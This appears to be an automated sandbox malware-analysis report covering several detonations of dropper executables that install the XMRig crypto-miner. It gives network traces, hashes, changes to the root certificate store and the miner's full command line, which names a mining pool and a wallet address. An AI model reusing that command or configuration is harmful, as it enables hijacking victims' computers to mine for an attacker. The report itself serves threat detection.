GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 21.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 g.bing.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.113:443 www.bing.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 113.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
NL 23.62.61.113:443 www.bing.com tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 84.65.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
NL 23.62.61.113:443 www.bing.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 113.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 58.189.79.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:33

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1784s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
NL 23.62.61.106:443 www.bing.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 106.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.167.79.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240508-en

Max time kernel

1797s

Max time network

1786s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
NL 23.62.61.185:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 185.61.62.23.in-addr.arpa udp
NL 23.62.61.185:443 www.bing.com tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 91.16.208.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240508-en

Max time kernel

1794s

Max time network

1800s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.117.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6


Analysis: behavioral13

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1787s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6


Analysis: behavioral16

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:24

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1795s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 160.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6
